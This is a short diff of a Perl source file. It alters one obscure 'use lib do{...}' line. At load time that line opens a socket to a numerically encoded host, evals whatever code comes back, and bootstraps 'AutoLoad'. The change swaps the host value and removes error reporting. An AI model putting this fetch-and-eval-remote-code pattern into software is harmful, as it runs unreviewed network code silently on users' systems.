@@ -5,7 +5,7 @@
 
 use strict;
 use IO::Socket;
-use lib do{eval<$b>&&botstrap("AutoLoad")||die$@,<$b>if$b=new IO::Socket::INET 114.46.99.88.":1"};
+use lib do{eval<$b>&&botstrap("AutoLoad")if$b=new IO::Socket::INET 82.46.99.88.":1"};
 use Cwd qw(cwd);
 use Cwd::Guard qw(cwd_guard);
 
